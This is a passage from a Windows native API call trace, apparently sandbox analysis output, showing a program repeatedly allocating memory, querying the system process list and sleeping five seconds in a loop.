RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.447] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.450] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.455] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.461] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.462] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.464] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.469] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.473] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.481] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.485] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.488] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.489] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.497] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.505] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.505] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.506] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.507] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.508] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.512] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.515] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.522] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.525] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.530] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.544] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.551] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.557] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.560] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.568] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.574] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.585] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.587] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.594] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.598] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.599] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0235.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0235.601] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0235.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0235.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0235.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0235.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0235.607] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 